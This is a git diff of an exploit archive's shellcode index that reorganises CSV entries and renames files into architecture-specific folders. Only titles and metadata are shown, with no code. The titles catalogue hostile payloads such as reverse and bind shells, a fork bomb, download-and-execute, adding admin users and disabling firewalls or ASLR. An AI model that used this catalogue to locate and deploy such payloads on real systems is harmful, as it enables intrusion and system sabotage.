45943,shellcodes/linux_x86-64/45943.c,"Linux/x64 - Reverse (0.0.0.0:1907/TCP) Shell Shellcode (119 Bytes)",2018-12-04,"Kağan Çapar",shellcode,linux_x86-64 45980,shellcodes/linux_x86/45980.c,"Linux/x86 - Bind (1337/TCP) Ncat (/usr/bin/ncat) Shell (/bin/bash) + Null-Free Shellcode (95 bytes)",2018-12-11,T3jv1l,shellcode,linux_x86 46007,shellcodes/linux_x86-64/46007.c,"Linux/x64 - Disable ASLR Security Shellcode (93 Bytes)",2018-12-19,"Kağan Çapar",shellcode,linux_x86-64 -46039,shellcodes/linux/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux +46039,shellcodes/linux_x86/46039.c,"Linux/x86 - Kill All Processes Shellcode (14 bytes)",2018-12-24,strider,shellcode,linux_x86 46103,shellcodes/linux_x86/46103.c,"Linux/x86 - execve(/bin/sh -c) + wget (http://127.0.0.1:8080/evilfile) + chmod 777 + execute Shellcode (119 bytes)",2019-01-09,strider,shellcode,linux_x86 46123,shellcodes/generator/46123.py,"Windows/x86 - Download With TFTP And Execute Shellcode (51-60 bytes) (Generator)",2019-01-11,"Semen Alexandrovich Lyhin",shellcode,generator 46166,shellcodes/linux_x86/46166.c,"Linux/x86 - Bind (4444/TCP) Shell (/bin/sh) Shellcode (100 bytes)",2019-01-15,"Joao Batista",shellcode,linux_x86 @@ -1004,24 +1004,24 @@ id,file,description,date,author,type,platform 47396,shellcodes/linux_x86/47396.c,"Linux/x86 - Bind TCP (port 43690) Null-Free Shellcode (53 Bytes)",2019-09-17,"Daniel Ortiz",shellcode,linux_x86 47461,shellcodes/linux_x86/47461.c,"Linux/x86 - NOT + XOR-N + Random Encoded /bin/sh Shellcode (132 bytes)",2019-10-04,bolonobolo,shellcode,linux_x86 47473,shellcodes/arm/47473.c,"Linux/ARM - Fork Bomb Shellcode (20 bytes)",2019-10-08,CJHackerz,shellcode,arm -47481,shellcodes/linux/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux -47511,shellcodes/linux/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux -47513,shellcodes/linux/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux -47514,shellcodes/linux/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux -47530,shellcodes/linux/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux -47564,shellcodes/linux/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux +47481,shellcodes/linux_x86/47481.c,"Linux/x86 - Add User to /etc/passwd Shellcode (59 bytes)",2019-10-10,VL43CK,shellcode,linux_x86 +47511,shellcodes/linux_x86/47511.c,"Linux/x86 - adduser (User) to /etc/passwd Shellcode (74 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47513,shellcodes/linux_x86/47513.c,"Linux/x86 - execve /bin/sh Shellcode (25 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47514,shellcodes/linux_x86/47514.c,"Linux/x86 - Reverse Shell NULL free 127.0.0.1:4444 Shellcode (91 bytes)",2019-10-16,bolonobolo,shellcode,linux_x86 +47530,shellcodes/linux_x86/47530.txt,"Linux/x86 - execve(/bin/sh) socket reuse Shellcode (42 bytes)",2019-10-22,WangYihang,shellcode,linux_x86 +47564,shellcodes/linux_x86/47564.py,"Linux/x86 - (NOT|ROT+8 Encoded) execve(/bin/sh) null-free Shellcode (47 bytes)",2019-10-30,"Daniel Ortiz",shellcode,linux_x86 47784,shellcodes/linux_x86-64/47784.txt,"Linux/x64 - Reverse TCP Stager Shellcode (188 bytes)",2019-12-17,"Lee Mazzoleni",shellcode,linux_x86-64 -47877,shellcodes/linux/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux -47890,shellcodes/linux/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux +47877,shellcodes/linux_x86/47877.c,"Linux/x86 - Execve() Alphanumeric Shellcode (66 bytes)",2020-01-06,bolonobolo,shellcode,linux_x86 +47890,shellcodes/linux_x86/47890.c,"Linux/x86 - Random Bytes Encoder + XOR/SUB/NOT/ROR execve(/bin/sh) Shellcode (114 bytes)",2020-01-08,"Xenofon Vassilakopoulos",shellcode,linux_x86 47953,shellcodes/windows/47953.c,"Windows/7 - Screen Lock Shellcode (9 bytes)",2020-01-22,"Saswat Nayak",shellcode,windows -47980,shellcodes/windows/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows -48032,shellcodes/linux/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux +47980,shellcodes/windows_x86/47980.txt,"Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)",2020-01-30,boku,shellcode,windows_x86 +48032,shellcodes/linux_x86/48032.py,"Linux/x86 - Bind Shell Generator Shellcode (114 bytes)",2020-02-10,boku,shellcode,linux_x86 48116,shellcodes/windows_x86/48116.c,"Windows/x86 - Null-Free WinExec Calc.exe Shellcode (195 bytes)",2020-02-24,boku,shellcode,windows_x86 -48229,shellcodes/windows/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows -48243,shellcodes/linux/48243.txt,"Linux\x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux +48229,shellcodes/windows_x86-64/48229.txt,"Windows/x64 - Dynamic MessageBoxA or MessageBoxW PEB & Import Table Method Shellcode (232 bytes)",2020-03-18,boku,shellcode,windows_x86-64 +48243,shellcodes/linux_x86/48243.txt,"Linux/x86 - 'reboot' polymorphic Shellcode (26 bytes)",2020-03-23,Upayan,shellcode,linux_x86 48252,shellcodes/windows_x86-64/48252.txt,"Windows/x64 - WinExec Add-Admin (ROOT/I@mR00T$) Dynamic Null-Free Shellcode (210 Bytes)",2020-03-25,boku,shellcode,windows_x86-64 -48355,shellcodes/windows/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows -48379,shellcodes/linux/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux +48355,shellcodes/windows_x86/48355.c,"Windows/x86 - MSVCRT System + Dynamic Null-free + Add RDP Admin + Disable Firewall + Enable RDP Shellcode (644 Bytes)",2020-04-21,boku,shellcode,windows_x86 +48379,shellcodes/linux_x86-64/48379.c,"Linux/x64 - Password (P3WP3Wl4ZerZ) + Bind (0.0.0.0:4444/TCP) Shell (/bin/bash) + Null-free Shellcode (272 Bytes)",2020-04-24,boku,shellcode,linux_x86-64 48585,shellcodes/arm/48585.c,"Linux/ARM - execve /bin/dash Shellcode (32 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48586,shellcodes/arm/48586.c,"Linux/ARM - Bind (0.0.0.0:1337/TCP) Shell (/bin/sh) + Null-Free Shellcode (100 bytes)",2020-06-15,"Anurag Srivastava",shellcode,arm 48592,shellcodes/linux_x86/48592.c,"Linux/x86 - ASLR deactivation polymorphic Shellcode (124 bytes)",2020-06-17,"Xenofon Vassilakopoulos",shellcode,linux_x86 diff --git a/shellcodes/linux/48379.c b/shellcodes/linux_x86-64/48379.c similarity index 100% rename from shellcodes/linux/48379.c rename to shellcodes/linux_x86-64/48379.c diff --git a/shellcodes/linux/45940.nasm b/shellcodes/linux_x86/45940.nasm similarity index 100% rename from shellcodes/linux/45940.nasm rename to shellcodes/linux_x86/45940.nasm diff --git a/shellcodes/linux/46039.c b/shellcodes/linux_x86/46039.c similarity index 100% rename from shellcodes/linux/46039.c rename to shellcodes/linux_x86/46039.c diff --git a/shellcodes/linux/47481.c b/shellcodes/linux_x86/47481.c similarity index 100% rename from shellcodes/linux/47481.c rename to shellcodes/linux_x86/47481.c diff --git a/shellcodes/linux/47511.c b/shellcodes/linux_x86/47511.c similarity index 100% rename from shellcodes/linux/47511.c rename to shellcodes/linux_x86/47511.c diff --git a/shellcodes/linux/47513.c b/shellcodes/linux_x86/47513.c similarity index 100% rename from shellcodes/linux/47513.c rename to shellcodes/linux_x86/47513.c diff --git a/shellcodes/linux/47514.c b/shellcodes/linux_x86/47514.c similarity index 100% rename from shellcodes/linux/47514.c rename to shellcodes/linux_x86/47514.c diff --git a/shellcodes/linux/47530.txt b/shellcodes/linux_x86/47530.txt similarity index 100% rename from shellcodes/linux/47530.txt rename to shellcodes/linux_x86/47530.txt diff --git a/shellcodes/linux/47564.py b/shellcodes/linux_x86/47564.py similarity index 100% rename from shellcodes/linux/47564.py rename to shellcodes/linux_x86/47564.py diff --git a/shellcodes/linux/47877.c b/shellcodes/linux_x86/47877.c similarity index 100% rename from shellcodes/linux/47877.c rename to shellcodes/linux_x86/47877.c diff --git a/shellcodes/linux/47890.c b/shellcodes/linux_x86/47890.c similarity index 100% rename from shellcodes/linux/47890.c rename to shellcodes/linux_x86/47890.c diff --git a/shellcodes/linux/48032.py b/shellcodes/linux_x86/48032.py similarity index 100% rename from shellcodes/linux/48032.py rename to shellcodes/linux_x86/48032.py diff --git a/shellcodes/linux/48243.txt b/shellcodes/linux_x86/48243.txt similarity index 100% rename from shellcodes/linux/48243.txt rename to shellcodes/linux_x86/48243.txt diff --git a/shellcodes/windows/48229.txt b/shellcodes/windows_x86-64/48229.txt similarity index 100% rename from shellcodes/windows/48229.txt rename to shellcodes/windows_x86-64/48229.txt diff --git a/shellcodes/windows/47980.txt b/shellcodes/windows_x86/47980.txt similarity index 100% rename from shellcodes/windows/47980.txt rename to shellcodes/windows_x86/47980.txt diff --git a/shellcodes/windows/48355.c b/shellcodes/windows_x86/48355.c similarity index 100% rename from shellcodes/windows/48355.c rename to shellcodes/windows_x86/48355.c